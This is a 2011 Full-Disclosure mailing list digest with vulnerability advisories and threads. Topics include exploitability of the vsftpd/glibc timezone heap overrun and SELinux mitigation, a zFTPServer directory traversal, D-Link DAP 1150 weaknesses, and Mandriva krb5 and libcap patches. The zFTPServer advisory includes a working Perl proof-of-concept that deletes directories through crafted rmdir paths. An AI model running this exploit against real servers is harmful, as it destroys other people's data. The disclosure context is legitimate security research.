Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity)

2011-12-12 Thread Ramon de C Valle
 This is afaik a patched CVE in Linux glibc [1] which can be triggered through
 the very secure ftp daemon [2] so it will only work on older linux distros.
 Be aware that vsftpd has privilege seperation built in so this bug
 will not yield a root shell.
 It could yield root only in junction with a linux kernel vulnerability
 because the attacker
 will not be able to break the chroot without being root.
 This bug has a low severity because it's hard to exploit.
 Linux systems without patched glibc are vulnerable even if the latest
 version vsftpd-2.3.4 is installed.
 The bug is in the glibc timezone code. vsftpd loads timezone files
 from /usr [3]. If the attacker is inside a chroot
 he can easily create this directory and the timezone file and trigger
 the heap overrun.

 A Debugging Session illustrating the bug can be found on youtube:
 http://www.youtube.com/watch?v=KRCuozBM_dQ
I did a brief analysis of this issue. And it seems vsftpd does not add anything 
to this as an attack vector. Althought we can control the size of the chunk to 
be allocated (i.e. transitions), and can arbitrarily allocate this chunk from 
fast bins, the main arena, or eventually, a new mmap()'ed heap. We do not have 
any control over when its adjacent chunks are allocated, freed, the type of 
their contents, when they will be used, how they will be used, and if they will 
be used and useful at all. In addition, the data used to overflow (i.e. 
transition times) are read and decoded as 4-byte integers in network 
(big-endian) byte order, which increases the difficulty in faking any 
structure, such as the adjacent allocated chunk to, at least, get outside of 
glibc scope after the overflow--since all return paths from __tzfile_read frees 
our controlled previously allocated chunk.

Do you or anyone know a way to potentially exploit this vulnerability?


 Cheers!
Thanks,


[1] http://dividead.wordpress.com/tag/heap-overflow/
[2] https://security.appspot.com/vsftpd.html
[3] For example /usr/share/zoneinfo/UTC-01:00

/Kingcope


-- 
Ramon de C Valle / Red Hat Security Response Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Call for Papers -YSTS 6 - Security Conference, Brazil

2011-12-12 Thread Luiz Eduardo
YSTS 6th Edition
Sao Paulo, Brazil
May 7th, 2012

Call for Papers Opens:  December 10th 2012
Call for Papers Close:   February 26th 2012
http://www.ysts.org
@ystscon

INTRODUCTION

After 5 very successful editions we are off to the 6th edition of the
you Sh0t the Sheriff security conference and we are sending this off
so you send us the coolest stuff you've been working on.
The conference will happening on May, 7th, 2012 in Sao Paulo, Brazil.
This is your chance to speak about that cool research you’ve been
working on, to those whom matter in the Brazilian Information Security
realm.

ABOUT THE CONFERENCE

you Sh0t the Sheriff is a very unique, one-day, event dedicated to
bringing cutting edge talks to the top-notch professionals of the
Information Security Community in Brazil.

The conference’s main goal is to bring the attendees to the most
up-to-date state of the information security world by mixing
professionals and topics from different Infosec segments of the
market.

yStS is a very exclusive, mostly invite-only security con. Getting a
talk accepted, will, not only get you to the event, but after you
successfully present your talk, you will receive a challenge-coin that
guarantees your entry to yStS for as long as the conference exists.

Due to the great success of the previous years' editions, yes, we're
keeping the same
format:

* YSTS 6 will be held at an almost secret location only announced to whom
it may concern a couple of weeks before the con
* the venue will be, most likely, a very cool club or a bar
(seriously, see pictures)
* appropriate environment to network with great security folks from
Brazil and abroad
* since it’s a 1 day con with tons of talks, we provide to everyone
coffee, lunch and booze


CONFERENCE FORMAT

Anything Information Security related is interesting for the
conference, although we strictly do not accept commercial/
product-related pitches. Keep in mind though, this is a one-day
conference, we receive a lot of submissions, so please do your best in
sending new / coolest research.

Just in case you need some ideas, some of the topics in security that
could be interesting to us:

 * Mobile Devices
 * Social Netwoking Threats
 * Embedded Systems
 * Social Networking and Client-Side Techniques
 * Red Team Techniques
 * Inside Jobs Detection/ Techniques
 * Operating Systems
 * Career  Management topics
 * (cool and useful) Information Security Policies
 * Privacy in the Digital World
 * Messing with Network Protocols
 * 802.11 Wireless and any RF related stuff for that matter
 * Authentication
 * Incident Response Stories and Policies
 * Information Warfare
 * Malware/ Botnets
 * DDoS Evolution or Stories
 * Secure Programming
 * Hacker Culture
 * Application Security
 * Virtualization
 * DataBase Security
 * the Cloud
 * Cryptography
 * System Weaknesses
 * Infrastructure and Critical Systems
 * Reverse Engineering
 * Social Reverse Engineering
 * Reversing Social Engineering
 * Caipirinha and Feijoada Hacks
 * and everything else information security related that our attendees
would enjoy, the coolest/ different/ most creative submissions win,
keep that in mind!

We do like shorter talks, so, please submit your talks and remember
they must be 30 minutes long. (yes, we do strictly enforce that)

We’re also opened to some 15-minute talks, some of the smart people
around might not need 30 minutes to deliver a message, or it might be
a project that has been just kicked-off.
15 minutes might be your thing and that's nothing to be ashamed about.

you Sh0t the Sheriff is the perfect conference to release your new
projects, other people have released very cool research before they
presented it at the bigger cons.
And yes, we do prefer new hot-topics and, yes, first-time speakers
are more than welcome.
If you got good stuff to speak about, that's all that matters.

SPEAKER PRIVILEGES
(and, that applies only to the 30 minute-long talks)

* USD 1,000.00 to help covering travel expenses for international speakers
* Breakfast, lunch and dinner during conference
* Pre-and-post-conference official party (and the unofficial ones as well)
* Auditing products in traditional Brazilian barbecue restaurants
* Life-time free admission for all future yStS conferences (yes, if you 've
spoken before at yStS, you have your free-entry guaranteed, just buy us a
beer, ohh, wait, it's free anyways, isn't it?)


CFP IMPORTANT INFO (aka: what do we need from you)

Each paper submission must include the following information:

 * Abstract/ Presentation Title
 * Summary or abstract for your presentation
 * Your Name, company/title, address, email and phone/contact number
 * Short biography and qualification
 * Speaking experience
 * Do you need or have a visa to come to Brasil?
 * is it a 30 minute or a 15 minute talk?
 * Technical requirements (others than LCD Projector)
 * Other publications or conferences where this material has been or
   will be published/submitted.


VERY IMPORTANT DATES

Final CFP 

[Full-disclosure] zFTPServer Suite 6.0.0.52 'rmdir' Directory Traversal

2011-12-12 Thread Schurtz, Stefan
Advisory:   zFTPServer Suite 6.0.0.52 'rmdir' Directory
Traversal
Advisory ID:INFOSERVE-ADV2011-09
Author: Stefan Schurtz
Contact:secur...@infoserve.de
Affected Software:  Successfully tested on zFTPServer Suite 6.0.0.52
Vendor URL: http://www.zftpserver.com/
Vendor Status:  fixed
CVE-ID: CVE-2011-4717

==
Vulnerability Description
==

zFTPServer 'rmdir' is prone to a Directory Traversal, which makes it
possible to delete directories in the system

=
Solution
=

Fixed, but no new release available, as a workaround disable
Directories-Delete


Disclosure Timeline


04-Dec-2011 - informed vendor
06-Dec-2011 - fixed by vendor
10-Dec-2011 - release date of this security advisory


Credits


Vulnerabilitiy found and advisory written by the INFOSERVE security team.

===
References
===

http://forum.zftpserver.com/viewtopic.php?f=4t=2927
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-09.txt

Best regards,
Stefan Schurtz | SECURE INFRASTRUCTURE

INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken
Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 | s.schu...@infoserve.de |
www.infoserve.de

Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort:
Saarbrücken
Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599
#!/usr/bin/perl
use strict;
use Net::FTP;

my $user = anonymous;
my $password = anonymous@;


# connect

my $target = $ARGV[0];
my $plength = $ARGV[1];

print \n;
print \t###\n;
print \t# This PoC-Exploit is only for educational purpose!!! #\n;
print \t###\n;
print \n;

if (!$ARGV[0]||!$ARGV[1]) {
print [+] Usage: $@ target payload length\n;
exit 1;
}

my $ftp=Net::FTP-new($target,Timeout=15) or die Cannot connect to $target: 
$@;
print [+] Connected to $target\n;


# login

$ftp-login($user,$password) or die Cannot login , $ftp-message;
print [+] Logged in with user $user\n;

###
# Building payload '//' with min. length of 38
##
my @p = ( ,.,.,.,.,/,/ );
my $payload;

print [+] Building payload\n;

for (my $i=1;$i=$plength;$i++) {
 $payload .= $p[$i];
 push(@p,$p[$i]);
}
sleep(3);

#
# Sending payload
#
print [+] Sending payload $payload\n;
$ftp-rmdir($payload) or die rmdir failed , $ftp-message;

##
# disconnect
##
print [+] Done\n;
$ftp-quit;
exit 0;
#EOF


smime.p7s
Description: S/MIME cryptographic signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-12 Thread HI-TECH .
Hi Ramon,
I have not tried much, but I have not get ouside of glibc scope after the 
overflow within a controllable environment. In your video, It seems you 
overwrite the file structure used in __tzfile_read. Is this a constant and 
controllable behaviour?
I havent looked into it yet, just saw the 0x41414141 in the registers
and assumed it is exploitable.I will have a look into it when I find
time and post the results here.
One important thing to note is in Fedora and RHEL, when running SELinux, 
vsftpd runs confined by default, and can be configured by the following 
booleans:[rcvalle@localhost ~]$ getsebool -a | grep 
ftpdallow_ftpd_anon_write -- offallow_ftpd_full_access -- 
offallow_ftpd_use_cifs -- offallow_ftpd_use_nfs -- offftpd_connect_db -- 
off[...][rcvalle@localhost ~]$And unless the boolean 
allow_ftpd_full_access is enabled, vsftpd may not be allowed to read this file 
by default. Could you cause this running the vsftpd installed from packages 
distributed with CentOS, Fedora, or RHEL? I'm copying Dan Walsh so he can 
comment on this.
The youtube video shows a CentOS 5.5 default install with vsftpd
compiled from sources as far as I remember, I didnt look into the
SELinux conf tough.
Sorry for the vague information but currently I am a bit busy, when I
will find time I might clarify on these things.
Regards,
/Kingcope

-- Weitergeleitete Nachricht --
Von: Ramon de C Valle rcva...@redhat.com
Datum: 11. Dezember 2011 16:41
Betreff: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity)
An: HI-TECH . isowarez.isowarez.isowa...@googlemail.com,
dwa...@redhat.com, jo...@grok.org
Cc: full-disclosure@lists.grok.org.uk



 Hi Ramon,
 Frankly I didn't look into the possibility to exploit this
 vulnerability,
 so i do not know if it is easy or hard to exploit. As you outlined
 it is difficult, during your audit you did not manage to trigger a
 function pointer call? : i guess not
I have not tried much, but I have not get ouside of glibc scope after
the overflow within a controllable environment. In your video, It
seems you overwrite the file structure used in __tzfile_read. Is this
a constant and controllable behaviour?

 I am not much into exploiting heap based overruns in the old times
 fashion.
 BTW both freebsd and pure-ftpd load locale files (strace it and you
 will see) from /usr,
 these locale files are used for the ftp responses to make them
 written
 in international language.
 FreeBSD ftpd in junction with the locale files loading will SIGSEGV
 (EIP overwrite)
 due to a strcpy in locale responses in a special codepath. I did not
 find a way to exploit Pure-FTPD through this
 locale loading tough, because Pure-FTPD is very restrictive in many
 ways even
I have not looked this yet, I'll take a look as soon as I have some
time. But thanks for the additional information.

 on response lines but there might be a vuln there too. (I dont
 remember if locale loading was only
 on FreeBSD or also on Linux or also in vsftpd, since the libc behaves
 very different in BSD/glibc/eglibc etc)
One important thing to note is in Fedora and RHEL, when running
SELinux, vsftpd runs confined by default, and can be configured by the
following booleans:

[rcvalle@localhost ~]$ getsebool -a | grep ftpd
allow_ftpd_anon_write -- off
allow_ftpd_full_access -- off
allow_ftpd_use_cifs -- off
allow_ftpd_use_nfs -- off
ftpd_connect_db -- off

[...]

[rcvalle@localhost ~]$

And unless the boolean allow_ftpd_full_access is enabled, vsftpd may
not be allowed to read this file by default. Could you cause this
running the vsftpd installed from packages distributed with CentOS,
Fedora, or RHEL? I'm copying Dan Walsh so he can comment on this.


 Regards,
Thanks for forwarding my message to the list. It seems that my Red Hat
email address has not yet been approved. John, can you approve this
email address please?


--
Ramon de C Valle / Red Hat Security Response Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Google open redirect

2011-12-12 Thread Charles Morris
Just quickly I digress; this is a massive problem in the mindset of many.

They won't ever learn about something if they aren't ever made aware of it.

Say, by fixing the problem...


 I have seen the most users don't understand X anyway as an argument
 against fixing X in the browser several times before, and I think
 that's wrong; but I'm not sure this is applicable here.

 /mz


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vulnerabilities in D-Link DAP 1150

2011-12-12 Thread MustLive
Hello list!

I want to warn you about security vulnerabilities in D-Link DAP 1150 (WiFi
Access Point and Router).

These are Predictable Resource Location, Brute Force and Cross-Site Request
Forgery vulnerabilities. This is my second advisory from series of
advisories about vulnerabilities in D-Link products.

SecurityVulns ID: 12076.

-
Affected products:
-

Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This
model with other firmware versions also must be vulnerable.

--
Details:
--

Predictable Resource Location (WASC-34):

http://192.168.0.50

The control panel of device is placed at default path with default login and
password (admin:admin). Which allows for local users (which have access to
PC or via LAN) and also for remote users via Internet (via CSRF) to get
access to control panel and change router's settings.

Default above-mentioned settings - it's standard practice of developers of
ADSL routers and other network devices, but D-Link became changing this
situation in their new devices.

For protecting against problems with default password, D-Link made the next
in admin panel: at the first enter to admin panel it's obligatory needed to
change a password. I.e. before changing settings it's needed to change
default password. And all developers of network devices should use such
approach. But Windows-application for configuration of the device, which is
bundled on CD, doesn't change a password, only change other settings of
access point. Thus it's possible to configure the device with leaving of
default password, which will leave the device vulnerable to attacks.

Brute Force (WASC-11):

In login form http://192.168.0.50 there is no protection against Brute Force
attacks. Which allows to pick up password (if it was changed from default),
particularly at local attack. E.g. via LAN malicious users or virus at some
computer can conduct attack for picking up the password, if it was changed.

CSRF (WASC-09):

Lack of protection against Brute Force (such as captcha) also leads to
possibility of conducting of CSRF attacks, which I wrote about in the
article Attacks on unprotected login forms
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).
It allows to conduct remote login. Which will be in handy at conducting of
attacks on different CSRF vulnerabilities in control panel, which I'll tell
you about later.


Timeline:


2011.11.17 - found vulnerabilities.
2011.12.09 - disclosed at my site.
2011.12.11 - informed developers.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/5558/).

Best wishes  regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2011:184 ] krb5

2011-12-12 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:184
 http://www.mandriva.com/security/
 ___

 Package : krb5
 Date: December 12, 2011
 Affected: 2011.
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in krb5:
 
 The process_tgs_req function in do_tgs_req.c in the Key Distribution
 Center (KDC) in MIT Kerberos 5 (aka krb5) 1.9 through 1.9.2 allows
 remote authenticated users to cause a denial of service (NULL pointer
 dereference and daemon crash) via a crafted TGS request that triggers
 an error other than the KRB5_KDB_NOENTRY error (CVE-2011-1530).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1530
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-007.txt
 ___

 Updated Packages:

 Mandriva Linux 2011:
 54a83cd6cdbc7f0d8c6a42294bc113b9  2011/i586/krb5-1.9.1-1.2-mdv2011.0.i586.rpm
 c31913958d5883a6dbc0325704cc39fa  
2011/i586/krb5-pkinit-openssl-1.9.1-1.2-mdv2011.0.i586.rpm
 946695d8f81db41d8d96dc7f042f7b5a  
2011/i586/krb5-server-1.9.1-1.2-mdv2011.0.i586.rpm
 8d4c45656dee7a304c2949b310e4ac15  
2011/i586/krb5-server-ldap-1.9.1-1.2-mdv2011.0.i586.rpm
 793a023ecb27c0da74fd5ce2d427f313  
2011/i586/krb5-workstation-1.9.1-1.2-mdv2011.0.i586.rpm
 21adde2be479d0d88cc4d4b4ccdc830f  
2011/i586/libkrb53-1.9.1-1.2-mdv2011.0.i586.rpm
 2e6fccb5bd6d4952760ea9f775cbc82f  
2011/i586/libkrb53-devel-1.9.1-1.2-mdv2011.0.i586.rpm 
 969f9571e81879d930765641058a36d7  2011/SRPMS/krb5-1.9.1-1.2.src.rpm

 Mandriva Linux 2011/X86_64:
 2c955a204331355400fbb314916e08c3  
2011/x86_64/krb5-1.9.1-1.2-mdv2011.0.x86_64.rpm
 96830217b39f95a75c4595bad116b767  
2011/x86_64/krb5-pkinit-openssl-1.9.1-1.2-mdv2011.0.x86_64.rpm
 1fda8cc8c58d6b7676fda754cc94fee8  
2011/x86_64/krb5-server-1.9.1-1.2-mdv2011.0.x86_64.rpm
 d96a439614ec95f1382b617ce1d8fa26  
2011/x86_64/krb5-server-ldap-1.9.1-1.2-mdv2011.0.x86_64.rpm
 5bedc418631830dbe231dffa7fe95f69  
2011/x86_64/krb5-workstation-1.9.1-1.2-mdv2011.0.x86_64.rpm
 be039c2f29add507c55fa24e67f151ce  
2011/x86_64/lib64krb53-1.9.1-1.2-mdv2011.0.x86_64.rpm
 bafc29ad3c0bc69293b06742743dc915  
2011/x86_64/lib64krb53-devel-1.9.1-1.2-mdv2011.0.x86_64.rpm 
 969f9571e81879d930765641058a36d7  2011/SRPMS/krb5-1.9.1-1.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFO5eu1mqjQ0CJFipgRAvkYAJ4pAWvQnHNkyeazqSO+FAyKiFnUwgCghzr+
N9Jw2Cckoxly2kqpa5X7WQI=
=YKM3
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial

2011-12-12 Thread Jacqui Caren
On 09/12/2011 10:27, xD 0x41 wrote:
 So, whos going to offer REAL DAMN ONLINE SEC HELP HERE , SIMPLE

I read this assuming a russian accent until I hit the SIMPLE (with a four dot 
ellipse - shudder)
 From that point on everything will be read in meerkat and I just laughed my 
head off.

Simples (cheep).

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-12 Thread Ramon de C Valle
 I havent looked into it yet, just saw the 0x41414141 in the registers
 and assumed it is exploitable.I will have a look into it when I find
 time and post the results here.
Just some additional information about what probably happened in your case, and 
why I've asked if this behaviour is consistent.

In Red Hat Enterprise Linux 6, vsftpd-2.2.2, and glibc 2.12:

[...]

(gdb) c
Continuing.

Program received signal SIGABRT, Aborted.
0x009c2424 in __kernel_vsyscall ()
(gdb) bt
#0  0x009c2424 in __kernel_vsyscall ()
#1  0x001bdd31 in raise () from /lib/libc.so.6
#2  0x001bf60a in abort () from /lib/libc.so.6
#3  0x001fbd5d in __libc_message () from /lib/libc.so.6
#4  0x002021a1 in malloc_printerr () from /lib/libc.so.6
#5  0x00222ca3 in __tzfile_read () from /lib/libc.so.6
#6  0x00222348 in tzset_internal () from /lib/libc.so.6
#7  0x00222491 in __tz_convert () from /lib/libc.so.6
#8  0x0022078f in localtime () from /lib/libc.so.6
#9  0x00180f1d in ?? ()
#10 0x001769de in ?? ()
#11 0x00176cb8 in ?? ()
#12 0x001701aa in ?? ()
#13 0x00172758 in ?? ()
#14 0x0017a46e in ?? ()
#15 0x0017a937 in ?? ()
#16 0x0016d58d in main ()
(gdb) f 5
#5  0x00222ca3 in __tzfile_read () from /lib/libc.so.6
(gdb) i r
eax0x0  0
ecx0x53e1342
edx0x6  6
ebx0x319ff4 3252212
esp0xbfb34fc8   0xbfb34fc8
ebp0xbfb350dc   0xbfb350dc
esi0x1f4500
edi0x12cf0f819722488
eip0x222ca3 0x222ca3 __tzfile_read+83
eflags 0x200202 [ IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0  0
gs 0x33 51
(gdb) x/i $eip
= 0x222ca3 __tzfile_read+83: movl   $0x0,0x9c0(%ebx)
(gdb) i r ebx
ebx0x319ff4 3252212
(gdb) x/x $ebx+0x9c0
0x31a9b4 transitions: 0x012ce928
(gdb) x/i $eip
= 0x222ca3 __tzfile_read+83: movl   $0x0,0x9c0(%ebx)
(gdb) 
   0x222cad __tzfile_read+93: lea-0xc(%ebp),%esp
(gdb) 
   0x222cb0 __tzfile_read+96: pop%ebx
(gdb) 
   0x222cb1 __tzfile_read+97: pop%esi
(gdb) 
   0x222cb2 __tzfile_read+98: pop%edi
(gdb) 
   0x222cb3 __tzfile_read+99: pop%ebp
(gdb) 
   0x222cb4 __tzfile_read+100:ret
(gdb) 

As I mentioned, this is detected by glibc when freeing our controlled chunk 
(i.e. transitions), before returning from __tzfile_read. In the video, I see 
you used dividead's exploit without change, thus malloc(0) most likely 
allocated from fast bins, and you probably had the __tzfile_read (i.e. f) file 
structure allocated nearby within the ~5 adjacent bytes, and had this 
corrupted at some place in main arena (since file structures are larger than 64 
bytes and will not be allocated from fast bins). You probably will see this 
behaviour repeat, but most likely the file structure will not be located at the 
same offset in your buffer.

For SELinux, unfortunately it seems that with the appropriate configuration of 
allow_ftpd_full_access disabled and ftp_home_dir enabled, a vsftpd process 
chrooted and confined (i.e. ftpd_t) allow locale files to be opened not having 
the locale_t type (i.e. user_home_t, in this case), which if don't allow would 
have completely mitigated this issue. Dan, could you fix this in SELinux policy?

Thanks,

-- 
Ramon de C Valle / Red Hat Security Response Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2011:185 ] libcap

2011-12-12 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:185
 http://www.mandriva.com/security/
 ___

 Package : libcap
 Date: December 12, 2011
 Affected: 2010.1, 2011., Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in libcap:
 
 capsh did not chdir(/) after callling chroot(). Programs could
 therefore access the current directory outside of the chroot
 (CVE-2011-4099).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4099
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 a1aa89a0b1d70848fdd1b91b1f499715  
2010.1/i586/libcap2-2.19-5.1mdv2010.2.i586.rpm
 d9b734bdc6a4b1be2bb7cc321d6e1c37  
2010.1/i586/libcap-devel-2.19-5.1mdv2010.2.i586.rpm
 9743b75064868e4459e328fb779659ea  
2010.1/i586/libcap-utils-2.19-5.1mdv2010.2.i586.rpm
 b7aa70bcc0d5850b9002ce7b79947a16  
2010.1/i586/pam_cap-2.19-5.1mdv2010.2.i586.rpm 
 0efc8c20a6470cfe4b197a397e8fa9fe  2010.1/SRPMS/libcap-2.19-5.1mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 bad8768c287d0caa596ebcf3298b7c24  
2010.1/x86_64/lib64cap2-2.19-5.1mdv2010.2.x86_64.rpm
 80ab533f0435ca8d0131cf1e2df3abca  
2010.1/x86_64/lib64cap-devel-2.19-5.1mdv2010.2.x86_64.rpm
 5707c86b275b22430d2b6d9072d6b49f  
2010.1/x86_64/libcap-utils-2.19-5.1mdv2010.2.x86_64.rpm
 af734f2e003072bbaeabfccfdefe3da4  
2010.1/x86_64/pam_cap-2.19-5.1mdv2010.2.x86_64.rpm 
 0efc8c20a6470cfe4b197a397e8fa9fe  2010.1/SRPMS/libcap-2.19-5.1mdv2010.2.src.rpm

 Mandriva Linux 2011:
 5d4dc6f480035acc78b321aa0b3461e9  2011/i586/libcap2-2.19-7.1-mdv2011.0.i586.rpm
 efb0aae7df9b50b9b5d2c839554d6a1a  
2011/i586/libcap-devel-2.19-7.1-mdv2011.0.i586.rpm
 0cc4703e8f22eb69d62294cec0f73c7f  
2011/i586/libcap-utils-2.19-7.1-mdv2011.0.i586.rpm
 db290982632ae980684f088688401a7e  
2011/i586/pam_cap-2.19-7.1-mdv2011.0.i586.rpm 
 ccd77a7775907368085d443e69767382  2011/SRPMS/libcap-2.19-7.1.src.rpm

 Mandriva Linux 2011/X86_64:
 72288e910ac68f086670baee76f76b91  
2011/x86_64/lib64cap2-2.19-7.1-mdv2011.0.x86_64.rpm
 e86cc72e4e15eacaf128585c199f0557  
2011/x86_64/lib64cap-devel-2.19-7.1-mdv2011.0.x86_64.rpm
 37fa28f00ebb730fd5b91457128a7576  
2011/x86_64/libcap-utils-2.19-7.1-mdv2011.0.x86_64.rpm
 e3faa58e81e49a6ac4729a98e835814e  
2011/x86_64/pam_cap-2.19-7.1-mdv2011.0.x86_64.rpm 
 ccd77a7775907368085d443e69767382  2011/SRPMS/libcap-2.19-7.1.src.rpm

 Mandriva Enterprise Server 5:
 2352b4cb1b618a307b2a1a707d0b36de  mes5/i586/libcap2-2.10-1.2mdvmes5.2.i586.rpm
 be73f3d4f3c4192092c968b183895599  
mes5/i586/libcap-devel-2.10-1.2mdvmes5.2.i586.rpm
 14d651d422a4cee0701fa9d05750fd8c  
mes5/i586/libcap-utils-2.10-1.2mdvmes5.2.i586.rpm
 53d59bdf13449117bbc648caf7543e8f  mes5/i586/pam_cap-2.10-1.2mdvmes5.2.i586.rpm 
 e189f55eedba7655c1f211f7e406af60  mes5/SRPMS/libcap-2.10-1.2mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 5732ec43dcd02d2fbb11e808d6dd10d7  
mes5/x86_64/lib64cap2-2.10-1.2mdvmes5.2.x86_64.rpm
 8999ca23503c2256a06fe124ca3b6a3d  
mes5/x86_64/lib64cap-devel-2.10-1.2mdvmes5.2.x86_64.rpm
 0ffb9699516cc66da453962b671d1940  
mes5/x86_64/libcap-utils-2.10-1.2mdvmes5.2.x86_64.rpm
 ac14e30438d172c57c3ee886ead7f24d  
mes5/x86_64/pam_cap-2.10-1.2mdvmes5.2.x86_64.rpm 
 e189f55eedba7655c1f211f7e406af60  mes5/SRPMS/libcap-2.10-1.2mdvmes5.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFO5f8ymqjQ0CJFipgRAilpAJ4hCCqe0HBbxyvVODQQUkDyQN7ysACghZn9
Wrl2Fm4qiIYLXH5+v0IlQNw=
=euQT
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-12 Thread Ramon de C Valle


 Ramon, not sure I understand, what are you trying to prevent here?
Hello Dan, vsftpd processes open locale files from the /usr/share/zoneinfo 
directory, which are expected to have the locale_t type. A chrooted user can 
create a specially-crafted locale file in /home/user/usr/share/zoneinfo 
directory to try exploiting this glibc vulnerability. However, the 
specially-crafted locale file created will have the user_home_t type and not 
the locale_t. SELinux rules for vsftpd (i.e. ftpd_t) allowing only opening 
locale files from usr_t directories with locale_t type should have 
completely mitigated this.

-- 
Ramon de C Valle / Red Hat Security Response Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Firefox forensics with SQLite Manager at InfoSec Institute

2011-12-12 Thread Adam Behnke
Hello, a recent article here on how to perform forensics investigations on
Firefox with SQLite Manager:

 

http://resources.infosecinstitute.com/firefox-and-sqlite-forensics/

 

This is relevant because it is easy to install, doesn't require you to buy a
$4,000 forensic software tool (Encase, FTK, etc.), and gives you lots of
good data on forms, cookies, addons, extension, SSL sessions, etc.

 

Your thoughts?

 

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-12 Thread Ramon de C Valle

 But how can I state that ftp has access to the users homedir and not
 allow access to user_home_t?
This is a good question. Actually, we shouldn't allow ftpd_t read the locale 
files from within user_home_t directories. But now I'm not sure if this will be 
possible.


-- 
Ramon de C Valle / Red Hat Security Response Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-12 Thread Valdis . Kletnieks
On Mon, 12 Dec 2011 13:31:21 EST, Ramon de C Valle said:

 This is a good question. Actually, we shouldn't allow ftpd_t read the locale 
 files from within user_home_t directories.

To fill in the SELinux details for the people following along at home:

The problem is that at open() time, there's no good way to specify what the
expected label is (now *that* might be an interesting extention to open() for
some enterprisng grad student) - so as long as the file has *any* foo_t label
